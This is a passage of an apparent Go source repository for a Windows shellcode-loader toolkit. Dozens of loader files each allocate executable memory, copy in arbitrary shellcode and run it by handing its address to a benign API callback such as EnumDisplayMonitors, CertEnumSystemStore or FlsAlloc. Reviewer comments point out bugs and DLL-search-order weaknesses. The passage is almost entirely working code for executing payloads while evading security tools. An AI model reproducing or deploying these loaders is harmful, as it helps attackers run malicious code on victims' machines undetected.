RWX */ 13 | ) 14 | 15 | var ( 16 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 17 | ntdll = syscall.MustLoadDLL("ntdll.dll") 18 | Crypt32 = syscall.MustLoadDLL("Crypt32.dll") 19 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 20 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 21 | CertEnumSystemStore = Crypt32.MustFindProc("CertEnumSystemStore") 22 | ) 23 | 24 | /* Callback allocates RWX memory, copies shellcode into it and has CertEnumSystemStore invoke it. On an allocation "failure" (see the note on the check) it exits the process with status 0. */ func Callback(shellcode []byte) { 25 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 26 | /* NOTE(review): Proc.Call always returns a non-nil error (errno 0 stringifies as this English text), so this compares a localized message; on a non-English Windows a successful allocation still exits here. addr == 0 is the reliable failure test, and Exit(0) reports success to the parent. */ if err != nil && err.Error() != "The operation completed successfully." 
{ 27 | syscall.Exit(0) 28 | } 29 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 30 | CertEnumSystemStore.Call(windows.CERT_SYSTEM_STORE_CURRENT_USER, 0, 0, addr) /* dwFlags, pvSystemStoreLocationPara, pvArg, pfnEnum */ 31 | 32 | } 33 | -------------------------------------------------------------------------------- /pkg/CertEnumSystemStoreLocation/CertEnumSystemStoreLocation.go: -------------------------------------------------------------------------------- 1 | /* CertEnumSystemStoreLocation loader: RWX allocate-and-copy, then the region address is passed to Crypt32!CertEnumSystemStoreLocation as its PFN_CERT_ENUM_SYSTEM_STORE_LOCATION, so it runs once per store location. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | const ( 9 | MEM_COMMIT = 0x1000 10 | MEM_RESERVE = 0x2000 11 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 12 | ) 13 | 14 | var ( 15 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 16 | ntdll = syscall.MustLoadDLL("ntdll.dll") 17 | Crypt32 = syscall.MustLoadDLL("Crypt32.dll") /* NOTE(review): bare-name load; presumably default search order unless Go treats this exact spelling as a system DLL — confirm */ 18 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 19 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 20 | CertEnumSystemStoreLocation = Crypt32.MustFindProc("CertEnumSystemStoreLocation") 21 | ) 22 | 23 | /* Callback allocates RWX memory, copies shellcode into it and has CertEnumSystemStoreLocation invoke it. On an allocation "failure" (see the note on the check) it exits the process with status 0. */ func Callback(shellcode []byte) { 24 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 25 | /* NOTE(review): Proc.Call always returns a non-nil error (errno 0 stringifies as this English text), so this compares a localized message; on a non-English Windows a successful allocation still exits here. addr == 0 is the reliable failure test, and Exit(0) reports success to the parent. */ if err != nil && err.Error() != "The operation completed successfully." 
{ 26 | syscall.Exit(0) 27 | } 28 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 29 | CertEnumSystemStoreLocation.Call(0, 0, addr) /* dwFlags, pvArg, pfnEnum */ 30 | } 31 | -------------------------------------------------------------------------------- /pkg/EnumTimeFormatsEx/EnumTimeFormatsEx.go: -------------------------------------------------------------------------------- 1 | /* EnumTimeFormatsEx loader: RWX allocate-and-copy, then the region address is passed to kernel32!EnumTimeFormatsEx as its TIMEFMT_ENUMPROCEX for the system default locale name with TIME_NOSECONDS, so it runs once per matching time format. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 16 | TIME_NOSECONDS = 0x00000002 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | EnumTimeFormatsEx = kernel32.MustFindProc("EnumTimeFormatsEx") 25 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 26 | ) 27 | 28 | /* Callback allocates RWX memory, copies shellcode into it and has EnumTimeFormatsEx invoke it; no error is reported. */ func Callback(shellcode []byte) { 29 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 31 | LOCALE_NAME_SYSTEM_DEFAULT, _ := syscall.UTF16PtrFromString("!x-sys-default-locale") /* the documented LOCALE_NAME_SYSTEM_DEFAULT string; conversion error ignored */ 32 | EnumTimeFormatsEx.Call(addr, uintptr(unsafe.Pointer(LOCALE_NAME_SYSTEM_DEFAULT)), TIME_NOSECONDS, NULL) /* lpTimeFmtEnumProcEx, lpLocaleName, dwFlags, lParam */ 33 | } 34 | -------------------------------------------------------------------------------- /pkg/EnumerateLoadedModules/EnumerateLoadedModules.go: -------------------------------------------------------------------------------- 1 | /* EnumerateLoadedModules loader: RWX allocate-and-copy, then the current process handle and the region address are passed to Dbghelp!EnumerateLoadedModules, which calls the PENUMLOADED_MODULES_CALLBACK once per loaded module. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | Dbghelp = 
syscall.MustLoadDLL("Dbghelp.dll") /* NOTE(review): Dbghelp is not a KnownDLL and is loaded here by bare name, so a dbghelp.dll placed next to the executable would presumably be picked up first — confirm, or load by absolute path / NewLazySystemDLL */ 22 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 23 | GetCurrentProcess = kernel32.MustFindProc("GetCurrentProcess") 24 | EnumerateLoadedModules = Dbghelp.MustFindProc("EnumerateLoadedModules") 25 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 26 | ) 27 | 28 | /* Callback allocates RWX memory, copies shellcode into it and has EnumerateLoadedModules invoke it; no error is reported. */ func Callback(shellcode []byte) { 29 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 31 | Proces, _, _ := GetCurrentProcess.Call() /* pseudo-handle for the current process (sic: "Proces") */ 32 | EnumerateLoadedModules.Call(Proces, addr, 0) /* hProcess, EnumLoadedModulesCallback, UserContext */ 33 | } 34 | -------------------------------------------------------------------------------- /pkg/config/Funcinit.go: -------------------------------------------------------------------------------- 1 | /* Registry of loader names and the tool version. NOTE(review): the list is maintained by hand and must be kept in sync with the pkg/ directories (it matches the 46 loader directories listed in the tree at the time of writing). */ package Loaders 2 | 3 | /* CallBackFunc returns the hard-coded, alphabetically ordered list of loader names; the local name "fruits" is a leftover from wherever this was copied. */ func CallBackFunc() []string { 4 | fruits := []string{"CertEnumSystemStore", "CertEnumSystemStoreLocation", "CopyFile2", "CopyFileEx", "CreateThreadPoolWait", "CreateTimerQueueTimer_Tech", "CryptEnumOIDInfo", "EnumCalendarInfo", "EnumCalendarInfoEX", "EnumChildWindows", "EnumDesktopW", "EnumDesktopWindows", "EnumDirTreeW", "EnumDisplayMonitors", "EnumerateLoadedModules", "EnumFontFamiliesExW", "EnumFontFamiliesW", "EnumFontsW", "EnumICMProfiles", "EnumLanguageGroupLocalesW", "EnumObjects", "EnumPageFilesW", "EnumPropsEx", "EnumPropsW", "EnumPwrSchemes", "EnumResourceTypesExW", "EnumResourceTypesW", "EnumSystemLocales", "EnumThreadWindows", "EnumTimeFormatsEx", "EnumUILanguagesW", "EnumWindows", "EnumWindowStationsW", "FiberContextEdit", "FlsAlloc", "ImageGetDigestStream", "ImmEnumInputContext", "InitOnceExecuteOnce", "LdrEnumerateLoadedModules", "LdrpCallInitRoutine", "RtlUserFiberStart", "SetTimer", "SetupCommitFileQueueW", "SymEnumProcesses", "SymFindFileInPath", "SysEnumSourceFiles"} 5 | return fruits 6 | } 7 | /* VersionFunc returns the tool's version string. */ func VersionFunc() string { 8 | Version := "2.0.0" 9 | return Version 10 | } 11 | 
-------------------------------------------------------------------------------- /pkg/EnumDisplayMonitors/EnumDisplayMonitors.go: -------------------------------------------------------------------------------- 1 | /* EnumDisplayMonitors loader: RWX allocate-and-copy, then the region address is passed to user32!EnumDisplayMonitors as its MONITORENUMPROC with a NULL DC and NULL clip rectangle, so it runs once per display monitor. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int /* unused */ 10 | dummy [522]byte /* unused */ 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 17 | TRUE = 1 /* unused here */ 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | User32 = syscall.MustLoadDLL("User32.dll") /* NOTE(review): bare-name load; presumably default search order unless Go treats this exact spelling as a system DLL — confirm */ 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | EnumDisplayMonitors = User32.MustFindProc("EnumDisplayMonitors") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | /* Callback allocates RWX memory, copies shellcode into it and has EnumDisplayMonitors invoke it. On an allocation "failure" (see the note on the check) it exits the process with status 0. */ func Callback(shellcode []byte) { 30 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 31 | /* NOTE(review): Proc.Call always returns a non-nil error (errno 0 stringifies as this English text), so this compares a localized message; on a non-English Windows a successful allocation still exits here. addr == 0 is the reliable failure test, and Exit(0) reports success to the parent. */ if err != nil && err.Error() != "The operation completed successfully." 
{ 32 | syscall.Exit(0) 33 | } 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 35 | EnumDisplayMonitors.Call(0, 0, addr, 0) /* hdc, lprcClip, lpfnEnum, dwData */ 36 | } 37 | -------------------------------------------------------------------------------- /pkg/FlsAlloc/FlsAlloc.go: -------------------------------------------------------------------------------- 1 | /* FlsAlloc loader. Unlike the Enum* loaders this one does not call into the payload directly: the RWX region address is registered as the PFLS_CALLBACK_FUNCTION of a new fiber-local-storage slot, and a non-NULL value is stored in that slot. NOTE(review): by FLS semantics the callback fires when the slot is freed or the owning thread/fiber ends; nothing here calls FlsFree, so execution is deferred to thread exit — confirm on the target. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 16 | NULL = 0 17 | ) 18 | 19 | var ( 20 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 21 | ntdll = syscall.MustLoadDLL("ntdll.dll") 22 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 23 | GetCurrentProcess = kernel32.MustFindProc("GetCurrentProcess") /* resolved but never called in this file */ 24 | FlsAlloc = kernel32.MustFindProc("FlsAlloc") 25 | FlsSetValue = kernel32.MustFindProc("FlsSetValue") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | /* Callback allocates RWX memory, copies shellcode into it and registers it as an FLS destructor callback; no error is reported. */ func Callback(shellcode []byte) { 30 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 31 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 32 | dIndex, _, _ := FlsAlloc.Call(addr) /* NOTE(review): FLS_OUT_OF_INDEXES on failure is not checked */ 33 | dummy, _ := syscall.UTF16PtrFromString("dummy") /* any non-NULL value; the callback receives it as its argument */ 34 | FlsSetValue.Call(dIndex, (uintptr)(unsafe.Pointer(dummy))) 35 | } 36 | -------------------------------------------------------------------------------- /pkg/EnumFontFamiliesW/EnumFontFamiliesW.go: -------------------------------------------------------------------------------- 1 | /* EnumFontFamiliesW loader: RWX allocate-and-copy, then the region address is passed to Gdi32!EnumFontFamiliesW as its FONTENUMPROCW for the screen DC from GetDC(NULL), so it runs once per font family. NOTE(review): the DC is never released with ReleaseDC. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int /* unused */ 10 | dummy [522]byte /* unused */ 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = 
syscall.MustLoadDLL("ntdll.dll") 23 | User32 = syscall.MustLoadDLL("User32.dll") 24 | Gdi32 = syscall.MustLoadDLL("Gdi32.dll") /* NOTE(review): bare-name load; presumably resolved through the default search order (application directory first) — confirm, or load by absolute path / NewLazySystemDLL */ 25 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 26 | GetDC = User32.MustFindProc("GetDC") 27 | EnumFontFamiliesW = Gdi32.MustFindProc("EnumFontFamiliesW") 28 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 29 | ) 30 | 31 | /* Callback allocates RWX memory, copies shellcode into it and has EnumFontFamiliesW invoke it; no error is reported. */ func Callback(shellcode []byte) { 32 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 33 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 34 | dc, _, _ := GetDC.Call(NULL) /* screen DC; 0 is not checked and the DC is never released */ 35 | EnumFontFamiliesW.Call(dc, NULL, addr, NULL) /* hdc, lpLogfont (NULL = all families), lpProc, lParam */ 36 | } 37 | -------------------------------------------------------------------------------- /pkg/InitOnceExecuteOnce/InitOnceExecuteOnce.go: -------------------------------------------------------------------------------- 1 | /* InitOnceExecuteOnce loader: RWX allocate-and-copy, then the region address is passed to kernel32!InitOnceExecuteOnce as the PINIT_ONCE_FN for the package-level INIT_ONCE g_InitOnce. NOTE(review): because the INIT_ONCE is package-level and one-time by definition, only the first Callback call in a process runs the payload; later calls return without invoking it. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | g_InitOnce uintptr /* stands in for INIT_ONCE (pointer-sized); zero value = INIT_ONCE_STATIC_INIT */ 10 | lpContext uintptr /* receives the context pointer set by the init function, unused afterwards */ 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | InitOnceExecuteOnce = kernel32.MustFindProc("InitOnceExecuteOnce") 25 | GetCurrentProcess = kernel32.MustFindProc("GetCurrentProcess") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | /* Callback allocates RWX memory, copies shellcode into it and has InitOnceExecuteOnce invoke it once; no error is reported. */ func Callback(shellcode []byte) { 30 | GetCurrentProcess.Call() /* result discarded — dead call */ 31 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 32 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 33 | 34 | InitOnceExecuteOnce.Call((uintptr)(unsafe.Pointer(&g_InitOnce)), addr, NULL, (uintptr)(unsafe.Pointer(&lpContext))) /* InitOnce, InitFn, Parameter, Context */ 35 | } 36 | 
-------------------------------------------------------------------------------- /pkg/EnumCalendarInfo/EnumCalendarInfo.go: -------------------------------------------------------------------------------- 1 | /* EnumCalendarInfo loader: RWX allocate-and-copy, then the region address is passed to kernel32!EnumCalendarInfoW as its CALINFO_ENUMPROCW (locale SORT_DEFAULT, all calendars, CAL_SMONTHNAME1), so it runs once per calendar. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 16 | CAL_SMONTHNAME1 = 0x00000015 17 | ENUM_ALL_CALENDARS = 0xffffffff 18 | SORT_DEFAULT = 0x0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | EnumCalendarInfoW = kernel32.MustFindProc("EnumCalendarInfoW") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | /* Callback allocates RWX memory, copies shellcode into it and has EnumCalendarInfoW invoke it. On an allocation "failure" (see the note on the check) it exits the process with status 0. */ func Callback(shellcode []byte) { 30 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 31 | /* NOTE(review): Proc.Call always returns a non-nil error (errno 0 stringifies as this English text), so this compares a localized message; on a non-English Windows a successful allocation still exits here. addr == 0 is the reliable failure test, and Exit(0) reports success to the parent. */ if err != nil && err.Error() != "The operation completed successfully." 
{ 32 | syscall.Exit(0) 33 | } 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 35 | EnumCalendarInfoW.Call(addr, SORT_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1) /* lpCalInfoEnumProc, Locale, Calendar, CalType */ 36 | } 37 | -------------------------------------------------------------------------------- /pkg/EnumChildWindows/EnumChildWindows.go: -------------------------------------------------------------------------------- 1 | /* EnumChildWindows loader: RWX allocate-and-copy, then the region address is passed to user32!EnumChildWindows as its WNDENUMPROC with a NULL parent (documented as equivalent to EnumWindows), so it runs once per top-level window. The calendar constants below are copied from EnumCalendarInfo and unused here. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 16 | CAL_SMONTHNAME1 = 0x00000015 /* unused */ 17 | ENUM_ALL_CALENDARS = 0xffffffff /* unused */ 18 | SORT_DEFAULT = 0x0 /* unused */ 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | User32 = syscall.MustLoadDLL("User32.dll") /* NOTE(review): bare-name load; presumably default search order unless Go treats this exact spelling as a system DLL — confirm */ 25 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 26 | EnumChildWindows = User32.MustFindProc("EnumChildWindows") 27 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 28 | ) 29 | 30 | /* Callback allocates RWX memory, copies shellcode into it and has EnumChildWindows invoke it. On an allocation "failure" (see the note on the check) it exits the process with status 0. */ func Callback(shellcode []byte) { 31 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 32 | /* NOTE(review): Proc.Call always returns a non-nil error (errno 0 stringifies as this English text), so this compares a localized message; on a non-English Windows a successful allocation still exits here. addr == 0 is the reliable failure test, and Exit(0) reports success to the parent. */ if err != nil && err.Error() != "The operation completed successfully." 
{ 33 | syscall.Exit(0) 34 | } 35 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 36 | EnumChildWindows.Call(0, addr, 0) /* hWndParent (NULL), lpEnumFunc, lParam */ 37 | } 38 | -------------------------------------------------------------------------------- /pkg/EnumCalendarInfoEX/EnumCalendarInfoEX.go: -------------------------------------------------------------------------------- 1 | /* EnumCalendarInfoEX loader: RWX allocate-and-copy, then the region address is passed to kernel32!EnumCalendarInfoExW as its CALINFO_ENUMPROCEXW (locale SORT_DEFAULT, all calendars, CAL_SMONTHNAME1), so it runs once per calendar. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 16 | CAL_SMONTHNAME1 = 0x00000015 17 | ENUM_ALL_CALENDARS = 0xffffffff 18 | SORT_DEFAULT = 0x0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | EnumCalendarInfoExW = kernel32.MustFindProc("EnumCalendarInfoExW") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | /* Callback allocates RWX memory, copies shellcode into it and has EnumCalendarInfoExW invoke it. On an allocation "failure" (see the note on the check) it exits the process with status 0. */ func Callback(shellcode []byte) { 30 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 31 | /* NOTE(review): Proc.Call always returns a non-nil error (errno 0 stringifies as this English text), so this compares a localized message; on a non-English Windows a successful allocation still exits here. addr == 0 is the reliable failure test, and Exit(0) reports success to the parent. */ if err != nil && err.Error() != "The operation completed successfully." 
{ 32 | syscall.Exit(0) 33 | } 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | EnumCalendarInfoExW.Call(addr, SORT_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1) 36 | } 37 | -------------------------------------------------------------------------------- /pkg/EnumICMProfiles/EnumICMProfiles.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | Gdi32 = syscall.MustLoadDLL("Gdi32.dll") 22 | User32 = syscall.MustLoadDLL("User32.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | EnumICMProfilesW = Gdi32.MustFindProc("EnumICMProfilesW") 25 | GetDC = User32.MustFindProc("GetDC") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | func Callback(shellcode []byte) { 30 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 31 | if err != nil && err.Error() != "The operation completed successfully." 
{ 32 | syscall.Exit(0) 33 | } 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | dummy, _, _ := GetDC.Call(0) 36 | EnumICMProfilesW.Call(dummy, addr, 0) 37 | } 38 | -------------------------------------------------------------------------------- /pkg/EnumObjects/EnumObjects.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | dummy [522]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | OBJ_BRUSH = 2 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | User32 = syscall.MustLoadDLL("User32.dll") 25 | Gdi32 = syscall.MustLoadDLL("Gdi32.dll") 26 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 27 | GetDC = User32.MustFindProc("GetDC") 28 | EnumFontFamiliesW = Gdi32.MustFindProc("EnumFontFamiliesW") 29 | EnumObjects = Gdi32.MustFindProc("EnumObjects") 30 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 31 | ) 32 | 33 | func Callback(shellcode []byte) { 34 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 35 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 36 | dc, _, _ := GetDC.Call(NULL) 37 | EnumObjects.Call(dc, OBJ_BRUSH, addr, NULL) 38 | } 39 | -------------------------------------------------------------------------------- /pkg/EnumResourceTypesExW/EnumResourceTypesExW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | dummy [522]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | 
RESOURCE_ENUM_VALIDATE = 0x0008 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | LoadLibraryW = kernel32.MustFindProc("LoadLibraryW") 26 | EnumResourceTypesExW = kernel32.MustFindProc("EnumResourceTypesExW") 27 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 28 | ) 29 | 30 | func Callback(shellcode []byte) { 31 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 32 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 33 | 34 | p1, _ := syscall.UTF16PtrFromString("Kernel32.dll") 35 | dll1, _, _ := LoadLibraryW.Call(uintptr(unsafe.Pointer(p1))) 36 | EnumResourceTypesExW.Call(dll1, addr, NULL, RESOURCE_ENUM_VALIDATE, NULL) 37 | } 38 | -------------------------------------------------------------------------------- /pkg/EnumFontFamiliesExW/EnumFontFamiliesExW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | Gdi32 = syscall.MustLoadDLL("Gdi32.dll") 22 | User32 = syscall.MustLoadDLL("User32.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | EnumFontFamiliesExW = Gdi32.MustFindProc("EnumFontFamiliesExW") 25 | GetDC = User32.MustFindProc("GetDC") 26 